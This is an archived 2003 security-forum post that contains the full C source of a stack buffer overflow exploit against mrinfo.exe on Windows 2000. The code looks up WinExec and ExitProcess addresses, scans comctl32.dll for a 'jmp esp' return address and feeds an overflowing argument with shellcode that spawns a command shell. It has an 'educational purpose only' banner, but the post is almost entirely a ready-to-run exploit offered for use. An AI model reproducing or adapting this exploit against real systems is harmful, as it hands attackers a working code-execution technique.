Mrinfo.exe Exploit

GovernmentSecurity.org > The Archives > Exploit Articles

ehm

Sep 5 2003, 01:59 PM

/**********************************************************************/
/* [*] EDUCATIONAL PURPOSE ONLY DOESN'T GIVE ANY ADMIN RIGHTS [*] */
/**********************************************************************/
/** mrinfo.exe exploit for win2k only (winXP causes an exception **/
/** when it jumps to the jmp esp offset [in comctl32.dll] why?). **/
/**********************************************************************/
/******************** coded by Scurt && kralor ************************/
/*********************** comments by kralor ***************************/
/******************** http://www.coromputer.net ***********************/
/*********************** undernet #coromputer *************************/
/**********************************************************************/
#include <stdio.h>
#include <stdlib.h>
#include <conio.h>
#include <windows.h>
#define RET_DLL "comctl32.dll"
#define EXE "mrinfo.exe"
/***********************************************************************/
/**** int hardcore(char *buffer, char *lib, char *function, int pos) ***/
/***********************************************************************/
/* Function that puts the offset of a function from */
/* a dll into a buffer at the desired place. */
/***********************************************************************/
/* by kralor */
/***********************************************************************/
int hardcore(char *buffer,char *library,char *function, int pos)
{
void *pfunc;
HMODULE llib;
llib=LoadLibrary(library);
if(!llib)
return -1;
pfunc=GetProcAddress(llib,function);
if(!pfunc)
return -2;
buffer[pos]=((char *)&pfunc) [0];
buffer[pos+1]=((char *)&pfunc) [1];
buffer[pos+2]=((char *)&pfunc) [2];
buffer[pos+3]=((char *)&pfunc) [3];
return 0;
}
/***********************************************************************/
/**** char *scan_dll(char *lib) ***/
/***********************************************************************/
/* Function that scans a dll looking for the famous 2 opcodes */
/* jmp esp (0xff && 0xe4) and returns the offset */
/***********************************************************************/
/* by Scurt */
/***********************************************************************/
char *scan_dll(char *lib)
{
char nret[10]={0};
char *ret;
HMODULE offset;
BOOL end = FALSE;
int i=0;
int y;
offset=LoadLibrary(lib);
if(!offset)
return 0;
ret=(char*)malloc(10);
while(!end)
{
/* 0xff && 0xe4 == jmp esp */
/* 0xff && 0xd4 == call esp */
if((( BYTE *)offset)[i] == 0xff && (( BYTE *)offset)[i+1] == 0xe4)
{
sprintf(ret,"%x",&(( BYTE *)offset)[i]);
end= TRUE;
}
i++;
}
for(y=0;y<10;y++)
{
nret[y]=ret[y]-48;
if(nret[y]>10){
switch((nret[y]-33))
{
case 16:
nret[y]=0x0a;
break;
case 17:
nret[y]=0x0b;
break;
case 18:
nret[y]=0x0c;
break;
case 19:
nret[y]=0x0d;
break;
case 20:
nret[y]=0x0e;
break;
case 21:
nret[y]=0x0f;
break;
}

}

}
memset(ret,0,sizeof(ret));
ret[0]=nret[0]*0x10+nret[1];
ret[1]=nret[2]*0x10+nret[3];
ret[2]=nret[4]*0x10+nret[5];
ret[3]=nret[6]*0x10+nret[7];
return ret;
}
int main(void)
{
char *ret;
char buffer[128];
char* pbuffer;
char* pshellcode;
HMODULE mod;
/*
the shellcode in C looks like this:
WinExec("cmd",SW_SHOW);
ExitProcess(0x69);
huh..
*/
char shellcode[]= /* only a simple shellcode to spawn a shell */
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\xEB\x14" /* jmp there --- */
/*here: <---|- */
"\x58" /* pop eax || */
"\x6A\x05" /* push 0x05 || */
"\x50" /* push eax ("cmd") || */
"\xB8\x69\x69\x69\x69" /* mov eax, 69696969h || */
"\xFF\xD0" /* call eax (WinExec) || */
"\x6A\x69" /* push 0x69 || */
"\xB8\x69\x69\x69\x69" /* mov eax, 69696969h || */
"\xFF\xD0" /* call eax (ExitProcess) || */
/*there: <--| */
"\xE8\xEB\xFF\xFF\xFF" /* call here ---- */
"\x63\x6D\x64"; /* "cmd" */
printf("[*] Getting WinExec && ExitProcess addresses ...");
if(hardcore(shellcode,"kernel32.dll","WinExec", 24)) {
printf("error: unable to find WinExec function ...\r\n");
return -1;
}

if(hardcore(shellcode,"kernel32.dll","ExitProcess", 33)) {
printf("error: unable to find ExitProcess function ...\r\n");
return -1;
}
printf("Done\r\n");
mod=LoadLibrary("kernel32.dll");
printf("WinExec : 0x%x\r\n",GetProcAddress(mod,"WinExec"));
printf("ExitProcess: 0x%x\r\n",GetProcAddress(mod,"ExitProcess"));
printf("[*] Searching 'jmp esp' opcodes in %s ...",RET_DLL);
ret=scan_dll(RET_DLL);
if(!ret) {
printf("error: unable to find 'jmp esp' opcodes in %s\r\n",RET_DLL);
return 1;
}
printf("Done\r\n");
printf("jmp esp : 0x%x%x%x%x\r\n",(unsigned char)ret[0],(unsigned char)ret[1],(unsigned char)ret[2],(unsigned char)ret[3]);
pbuffer=&buffer[0];
pshellcode=&shellcode[0];
sprintf(pbuffer,"%s -i AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA%c%c%c%c%s",EXE,ret[3],ret[2],ret[1],ret[0],pshellcode);
printf("[*] Executing shellcode through %s ...",EXE);
system(buffer);
printf("Done\r\n");
Sleep(1000);
return 0;
}

This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.